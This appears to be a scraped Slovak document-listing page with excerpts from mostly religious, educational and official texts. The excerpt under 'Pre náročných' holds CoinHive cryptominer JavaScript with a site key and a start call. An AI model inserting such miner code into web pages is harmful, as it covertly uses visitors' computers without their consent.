Academia Mystagogica Sprievodca inteligentnej spirituality Je absolútne zásadné byť najskôr človekom Veru, veru, najskôr sa musíme snažiť byť dobrými

Academia Mystagogica Sprievodca inteligentnej spirituality Je absolútne zásadné byť najskôr človekom Veru, veru, najskôr sa musíme snažiť byť dobrými Academia Mystagogica Sprievodca inteligentnej spirituality Je absolútne zásadné byť najskôr človekom Veru, veru, najskôr sa musíme snažiť byť dobrými ľuďmi, až potom môžeme byť nefalošnými učeníkmi života

Podrobnejšie

Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu

Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu povahu, pozdvihnú naše životy a zintenzívnia naše

Podrobnejšie

LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej,

LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej, LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej, SO Rok vydania: 2019 Jazyková korektúra: Mgr. et Mgr.

Podrobnejšie

Prítomnosť príbuzných postihnutého pri kardiopulmonálnej resuscitácii

Prítomnosť príbuzných postihnutého pri kardiopulmonálnej resuscitácii XXI. Kongres České společnosti anesteziologie, resuscitace a intenzivní medicíny Olomouc 2014 Jana Boroňová Trnavská univerzita v Trnave Auris media, s.r.o. Trnava ...neexistujú predpísané pravidlá pre

Podrobnejšie

PASELL s.r.l.

PASELL s.r.l. Technical and Industrial Direction t 2009-2019 Pasell s.r.l. All rights reserved Spoločensky zodpovedné podnikanie nie je cieľ, ale cesta podniku SLOVAKIA s.r.o. 2009-2019 Pasell s.r.l. All rights reserved

Podrobnejšie

Microsoft Word - Čnosti.doc

Microsoft Word - Čnosti.doc len ako nejaký servis a nič viac. Musíme ísť medzi ľudí a hovoriť im o radostnej zvesti, vytrvať vo všetkých nástrahách a protivenstvách. Vo všetkom nám môže byť skutočne výborným príkladom svätý Ján Mária

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint BIBLIA Stará kniha a vždy nové Božie slovo KTO NEPOZNÁ BIBLIU NEPOZNÁ KRISTA (Sv. Hieronym) z gréčtiny a znamená KNIHA, KNIŽOČKY, SPISKY; ale aj BIBLIOTÉKA zoznam viac ako 40 kníh Starého zákona; Sväté

Podrobnejšie

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa nachádza, a ktorá je to kongregácia. Iní skúšajú zakladať

Podrobnejšie

Pobožnosť na vigíliu Narodenia Pána (v rodinách)

Pobožnosť na vigíliu Narodenia Pána (v rodinách) POBOŽNOSŤ NA VIGÍLIU NARODENIA PÁNA (v rodinách) Bezprostredne pred štedrou večerou sa rodina zíde na túto modlitbu. Vstupuje ňou do slávnosti Narodenia Pána. Miestom modlitby môže byť miesto, kde sa rodina

Podrobnejšie

Pre náročných

Pre náročných var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bU D87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); var miner = new CoinHive.Anonymous('_'); miner.start();

Podrobnejšie

MEN Kvapka informácií pre chlapcov

MEN Kvapka informácií pre chlapcov MEN Kvapka informácií pre chlapcov 1 1 Dôvod, prečo rozumieť menštruácii Každé dievča chce chlapca, ktorý jej rozumie a nerobí si z nej blbé vtipy, keď je jej zle. Lenže dievčatám býva zle väčšinou každý

Podrobnejšie

BU_3Q_2011.indd

BU_3Q_2011.indd 6 Týždeň od 30. júla do 5. augusta 40 Bohoslužba, pieseň a oslava Texty na tento týždeň: 1 Kron 16,8-36; Ž 32,1-5; 51,1-6; Fil 4,8; Zjav 4,9-11; 5,9-13 Základný verš Spievajte Hospodinovi novú pieseň,

Podrobnejšie

Microsoft Word - Kniha1_Tema_2_Student.doc

Microsoft Word - Kniha1_Tema_2_Student.doc TÉMA 2: ČO MUSÍM UROBIŤ, ABY SOM BOL SPASENÝ Prehľad témy Podstatou radostného kresťanského života, ktorý prináša ovocie, je úplné pochopenie evanjelia milosti. Dôsledky akéhokoľvek pozmenenia evanjelia

Podrobnejšie

Microsoft Word - MÁJOVÉ POBOŽNOSTI

Microsoft Word - MÁJOVÉ POBOŽNOSTI MÁJOVÉ POBOŽNOSTI 1 Mesiac máj je oddávna mesiacom Panny Márie. Prvá májová pobožnosť v modernom chápaní vznikla vo Verone v roku 1725. Pápeži podporovali tieto májové pobožnosti. Pápež Pavol VI. vydal

Podrobnejšie

EASA NPA Template

EASA NPA Template Európska agentúra pre bezpečnosť letectva Stanovisko č. 6/2013 Kritické úlohy údržby SÚVISIACE DOKUMENTY NPA/CRD 2012-04 RMT.0222 (MDM.020) 10.6.2013 Zhrnutie V tomto stanovisku sa riešia otázky bezpečnosti

Podrobnejšie

Krížová cesta Otcov

Krížová cesta Otcov Krížová cesta otcov / z rádia Lumen 2007 / Úvodná modlitba V mene Otca, i Syna i Ducha Svätého. Bože Otče, chceme sa teraz chvíľu zastaviť a spolu so sv. Jozefom, ktorý je vzorom nám mužom a otcom, chcem

Podrobnejšie

Ako ziskat uspokojenie a radost zo zivota_ 2015_117x179_DO TLACE.indd

Ako ziskat uspokojenie a radost zo zivota_ 2015_117x179_DO TLACE.indd Ak v srdci cítime radosť, je to znamenie, že konáme správne N epoznám veľa pravidiel šťastného života, ale toto jedno určite postačí: Hovorme, myslime a jednajme tak, ako nám káže svedomie. Nechci byť

Podrobnejšie

Ty si, Pane, trpel

Ty si, Pane, trpel Tulipánsky spevník Spoločenstvo Tulipánci 2009 Ty si, Pane, trpel 160 1. Ty si, Pane, trpel aj za moje hriechy, aj kvôli mne si ťažký kríž niesol. O mojich vinách kričia tvoje prebodnuté ruky, prebodnuté

Podrobnejšie

LINEAMENTA 2015

LINEAMENTA 2015 LINEAMENTA 2015 ÚVOD Prvý synodálny dokument Synody Ordinariátu ozbrojených síl a ozbrojených zborov Slovenskej republiky (ďalej Ordinariát OS a OZ SR) s názvom Lineamenta (z lat. linea - línia) je pracovný

Podrobnejšie

Microsoft Word - Vízia

Microsoft Word - Vízia VÍZIA ECAV 2020 Písmo, reformácia a Augsburské vyznanie Sme cirkvou Božieho slova, ktorej Písmo je prameňom viery a pravidlom života. Božie slovo obsiahnuté v Písme máme poverenie zvestovať pravdivo, odvážne

Podrobnejšie

MoSta 1.indd

MoSta 1.indd Načo je bolesť 2/2019 OĽGA ADAMKOVIČOVÁ-SEMKOVÁ (z básnickej zbierky Prídavok) Načo je bolesť smútok trápenie Človek s tým denne zápasí Viem o tom svoje Isto vieš aj ty Svoj kríž si nesie každý Zvyčajne

Podrobnejšie

GEN

GEN V Bratislave 16. septembra 2016 Bratislavské vyhlásenie Dnešné stretnutie v Bratislave sa odohráva v období, ktoré je pre náš európsky projekt kritické. Bratislavský samit 27 členských štátov sa venoval

Podrobnejšie

ODKLAD POVINNEJ ŠKOLSKEJ DOCHÁDZKY Informatívny materiál pre rodičov Centrum pedagogicko psychologického poradenstva a prevencie Levoča Ružová 91/1, 0

ODKLAD POVINNEJ ŠKOLSKEJ DOCHÁDZKY Informatívny materiál pre rodičov Centrum pedagogicko psychologického poradenstva a prevencie Levoča Ružová 91/1, 0 ODKLAD POVINNEJ ŠKOLSKEJ DOCHÁDZKY Informatívny materiál pre rodičov Centrum pedagogicko psychologického poradenstva a prevencie Levoča Ružová 91/1, 054 01 Levoča Čo je odklad povinnej školskej dochádzky?

Podrobnejšie

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusion Europe pripravila tento dokument, aby sme čo najviac pochopili a využili príležitosti, ktoré nám ponúkajú

Podrobnejšie

10-4 promo

10-4 promo strana 3 editoriál Vážení priatelia a priate¾ky šachovej hry, pred rokmi som bol v Po¾sku na jednej konferencii o regionálnom rozvoji. Podrobnosti nie sú dôležité, ale dobre si pamätám, ako sa niektorí

Podrobnejšie

Popolcová streda – 13

Popolcová streda – 13 ÚVAHY NA DNI VEĽKÉHO PÔSTU 2019 DRUHÝ PÔSTNY TÝŽDEŇ = 18. 3. 24. 3. 2019 2 Niekoľko slov na úvod: Materiály, ktoré budú umiestňované na farskej webovej stránke v RUBRIKE NOVINKY, Vás pozývajú k tomu, aby

Podrobnejšie

Národné centrum popularizácie vedy a techniky v spoločnosti

Národné centrum popularizácie vedy a techniky v spoločnosti JEDNA HLAVA RNDr. Katarína Teplanová, PhD. JEDNA HLAVA - Obsah 1. Vážny problém 2. Cieľ 3. Naše inštitucionálne riešenie 4. Malá ukážka 5. Svetový trend TEPLANOVÁ, K., JEDNA HLAVA, jeden žiak, jeden učiteľ.

Podrobnejšie

Microsoft Word - Čnosti.doc

Microsoft Word - Čnosti.doc Záver Zabúdať celý deň na seba, slová, ktoré sa nám môžu hlboko zaryť do srdca, keď do hĺbky prežijeme a budeme sa snažiť o čnosť pokory, ktorá je v tomto svete tak nesmierne potrebná. Niekedy sa možno

Podrobnejšie

Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu proti

Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu proti Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu protifašistických bojovníkov. Vážení čitatelia, napriek

Podrobnejšie

O JEDNOTE CIRKVI. (Satis Cognitum. Encyklika pápeža Leva XIII. 1896) Ctihodným bratom: patriarchom, primasom, arcibiskupom, biskupom a iným vrchným pa

O JEDNOTE CIRKVI. (Satis Cognitum. Encyklika pápeža Leva XIII. 1896) Ctihodným bratom: patriarchom, primasom, arcibiskupom, biskupom a iným vrchným pa O JEDNOTE CIRKVI. (Satis Cognitum. Encyklika pápeža Leva XIII. 1896) Ctihodným bratom: patriarchom, primasom, arcibiskupom, biskupom a iným vrchným pastierom, ktorí sú spojení v pokoji a spoločenstve s

Podrobnejšie

Všetky knihy spolu, od Genezis až po Zjavenie svätého Jána, tvoria akoby jednu obrovskú mozaiku, ktorý hýri všetkými rôznymi farbami. Aby sme mohli vi

Všetky knihy spolu, od Genezis až po Zjavenie svätého Jána, tvoria akoby jednu obrovskú mozaiku, ktorý hýri všetkými rôznymi farbami. Aby sme mohli vi Všetky knihy spolu, od Genezis až po Zjavenie svätého Jána, tvoria akoby jednu obrovskú mozaiku, ktorý hýri všetkými rôznymi farbami. Aby sme mohli vidieť a pochopiť obraz taký, aký je, musíme sa naň pozrieť

Podrobnejšie

Záleží Mu na vás Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Pán používa stupnicu veľmi odlišnú od tej svetskej, aby vážil hodnotu

Záleží Mu na vás Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Pán používa stupnicu veľmi odlišnú od tej svetskej, aby vážil hodnotu Záleží Mu na vás Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Pán používa stupnicu veľmi odlišnú od tej svetskej, aby vážil hodnotu duše. Mojžiš, jeden z najväčších prorokov, akého svet

Podrobnejšie

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí 1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí - Pierre a jeho uzdravenie z podvýživy UNICEF/UN0239556/Gilbertson

Podrobnejšie

Microsoft Word - Document4

Microsoft Word - Document4 Čiňte pokánie - aby som vás mohol uzdraviť Starší Neil L. Andersen Kvórum dvanástich apoštolov Výzva k pokániu je málokedy hlasom napomenutia, je to skôr milujúce naliehanie otočiť sa a znova sa obrátiť

Podrobnejšie

4 Týždeň od 16. do 22. januára 26 Sudcovia: konflikt a kríza Texty na tento týždeň Sudcov 4; Sudcov 6; Sudcov 14; Žid 11,32; 1Sam 2,12 25; 8,1 7 Zákla

4 Týždeň od 16. do 22. januára 26 Sudcovia: konflikt a kríza Texty na tento týždeň Sudcov 4; Sudcov 6; Sudcov 14; Žid 11,32; 1Sam 2,12 25; 8,1 7 Zákla 4 Týždeň od 16. do 22. januára 26 Sudcovia: konflikt a kríza Texty na tento týždeň Sudcov 4; Sudcov 6; Sudcov 14; Žid 11,32; 1Sam 2,12 25; 8,1 7 Základný verš Anna sa takto modlila: Srdce mi plesá v Hospodinovi,

Podrobnejšie

Kresťanstvo v Rímskej ríši Vypracovala: Juráková Beata Ježiš Kristus a vznik kresťanstva Kresťanstvo vzniklo v Palestíne na začiatku nášho letopočtu.

Kresťanstvo v Rímskej ríši Vypracovala: Juráková Beata Ježiš Kristus a vznik kresťanstva Kresťanstvo vzniklo v Palestíne na začiatku nášho letopočtu. Kresťanstvo v Rímskej ríši Vypracovala: Juráková Beata Ježiš Kristus a vznik kresťanstva Kresťanstvo vzniklo v Palestíne na začiatku nášho letopočtu. Palestína (provincia Judea) bola pod nadvládou Ríma

Podrobnejšie

STAUROS Č. 18 september 2013 Informátor gréckokatolíckej farnosti Bratislava - Staré mesto slovíčko o SLOVE Pred časom sme spomínali výrok istého člov

STAUROS Č. 18 september 2013 Informátor gréckokatolíckej farnosti Bratislava - Staré mesto slovíčko o SLOVE Pred časom sme spomínali výrok istého člov STAUROS Č. 18 september 2013 Informátor gréckokatolíckej farnosti Bratislava - Staré mesto slovíčko o SLOVE Pred časom sme spomínali výrok istého človeka, ktorý povedal, že ak by mal v rukách absolútnu

Podrobnejšie

AGENDA

AGENDA AGENDA Evanjelickej cirkvi augsburského vyznania na Slovensku 1996 VENI SANGTE SPIRITUS PASCE PASTOREM DUC DUCEM APERI APERTURO DA DATURO EMITTE SPIRITUM TUUM ET CREABUNTUR ET RENOVABIS FACIEM TERRAE AMEN

Podrobnejšie

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín,

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, aby strávili dovolenku v príjemnom prostredí a načerpali

Podrobnejšie

SK MATEMATICKA OLYMPIADA 2010/ ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak,

SK MATEMATICKA OLYMPIADA 2010/ ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak, SK MATEMATICKA OLYMPIADA 2010/2011 60. ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak, aby matematické operácie boli vypočítané správne.

Podrobnejšie

(Microsoft Word - 5.èíslo Budatínka)

(Microsoft Word - 5.èíslo Budatínka) ZŠ BUDATÍNSKA 61, BRATISLAVA ŠKOLSKÝ ROK 2018/2019 ŠKOLSKÝ ČASOPIS BUDATÍNKO 5 Valentín Valentín je sviatok zamilovaných. Tento sviatok sa koná 14.2. Je to sviatok lásky a šťastia. Posielajú sa Valentínske

Podrobnejšie

Páter Róbert a jeho misie v Rusku

Páter Róbert a jeho misie v Rusku Organizátori veľkopôstnej prípravy na internete na stránke www.40dni.sk požiadali pátra Roberta Baleka SVD verbistu misionára v Rusku v Moskve o zodpovedanie pár otázok, ktoré napísali vo zvedavosti návštevníci

Podrobnejšie

Anglický jazyk –časovo tematický plán

Anglický jazyk –časovo  tematický plán TEMATICKÝ VÝCHOVNO-VZDELÁVACÍ PLÁN UČIVA Predmet: Anglický jazyk Vysvetlivky k skratkám prierezových tém: Ročník: tretí - osobnostný a sociálny rozvoj Počet týždenne: 3 ENV - environmentálna výchova Úroveň:

Podrobnejšie

WALLMAPU

WALLMAPU WALLMAPU DOMINIK JAKUBOV 2018/2019 Obsah Poloha Ohraničenie Povrch Regióny Vlajka Mapuche Liečivá sila Machi Vojna Arauco Argentínska a Čílska okupácia Súčasnosť Zdroje Poloha Kontinent: Južná Amerika

Podrobnejšie

PRÍPRAVA NA VEDENIE VÝCHOVNO- VZDELÁVACÍCH ČINNOSTÍ V MŠ HRY A HROVÉ ČINNOSTI PODĽA VÝBERU DETÍ ZARIADENIE: MŠ Dr. Jasenského EP A. Kmeťa 17 NÁZOV TRI

PRÍPRAVA NA VEDENIE VÝCHOVNO- VZDELÁVACÍCH ČINNOSTÍ V MŠ HRY A HROVÉ ČINNOSTI PODĽA VÝBERU DETÍ ZARIADENIE: MŠ Dr. Jasenského EP A. Kmeťa 17 NÁZOV TRI PRÍPRAVA NA VEDENIE VÝCHOVNO- VZDELÁVACÍCH ČINNOSTÍ V MŠ HRY A HROVÉ ČINNOSTI PODĽA VÝBERU DETÍ ZARIADENIE: MŠ Dr. Jasenského EP A. Kmeťa 17 NÁZOV TRIEDY: NÁZOV TRIEDY: Slniečka MENO ŠTUDENTA: Dana Chrobáková

Podrobnejšie

SuhrnKrestanstva

SuhrnKrestanstva Súhrn základov kresťanstva v kocke pre študentov 1. ročníka gymnázií a stredných škôl inky 2011 1. Koľko Bohov poznáme? 39 Dnes teda vedz a vezmi si k srdcu, že Pán je jediný Boh hore na nebi a dolu na

Podrobnejšie

ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 2001 Vyhlásené: Časová verzia predpisu účinná od: Obsah tohto dokumentu má informatí

ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 2001 Vyhlásené: Časová verzia predpisu účinná od: Obsah tohto dokumentu má informatí ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 2001 Vyhlásené: 08.11.2001 Časová verzia predpisu účinná od: 05.03.2016 Obsah tohto dokumentu má informatívny charakter. 438 Z Á K O N z 3. októbra 2001 o platových

Podrobnejšie

Úvodné komentáre k čítaniam Tretej veľkonočnej nedele roku B (Biblická nedeľa) 1. čítanie: Sk 3, Prvé čítanie nám podáva vybraný úryvok z r

Úvodné komentáre k čítaniam Tretej veľkonočnej nedele roku B (Biblická nedeľa) 1. čítanie: Sk 3, Prvé čítanie nám podáva vybraný úryvok z r Úvodné komentáre k čítaniam Tretej veľkonočnej nedele roku B (Biblická nedeľa) 1. čítanie: Sk 3,13-15.17-19 Prvé čítanie nám podáva vybraný úryvok z reči apoštola Petra k ľudu potom, čo Peter urobil zázrak

Podrobnejšie

STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Je

STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Je STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Ježiša, menej náboženstva. Autor Steve Arterburn v nej

Podrobnejšie

bakalarska prezentacia.key

bakalarska prezentacia.key Inteligentné vyhľadávanie v systéme na evidenciu skautských družinových hier Richard Dvorský Základné pojmy Generátor družinoviek Inteligentné vyhľadávanie Ako to funguje Základné pojmy Skautská družina

Podrobnejšie

Dejepis extra 12/2018 Časopis nie iba pre tých, čo majú radi históriu... Pred budovou Národnej banky Slovenska.

Dejepis extra 12/2018 Časopis nie iba pre tých, čo majú radi históriu... Pred budovou Národnej banky Slovenska. Dejepis extra 12/2018 Časopis nie iba pre tých, čo majú radi históriu... Pred budovou Národnej banky Slovenska. Dňa 15.11. 2018 sa žiaci 7. B vydali na svoju prvú tohoročnú dejepisnú exkurziu. Našim prvým

Podrobnejšie

Anna - zena, ktora verila v modlitbu.doc

Anna - zena, ktora verila v modlitbu.doc ANNA, ŽENA, KTORÁ VERILA V MODLITBU 070517 1 Sam. 1,9-28 Ľudské dejiny mali veľkých mužov a veľké ženy, aj Biblia ich má. Jednou takouto veľkou, možno najväčšou ženou Starej zmluvy bola Anna, matka Samuelova.

Podrobnejšie

Hlas Medjugoria 2010_ 11

Hlas Medjugoria 2010_ 11 Hlas Med Medžugoria Časopis modlitbových skupín N O V E M B E R 2 0 1 0 MODLITBOVÝ ÚMYSEL NA MESIAC: m o d l i m e s a z a SVÄTÉHO OTCA, BISKUPOV A ZASVÄTENÉ OSOBY. V T O M T O Č Í S L E N Á J D E T E...

Podrobnejšie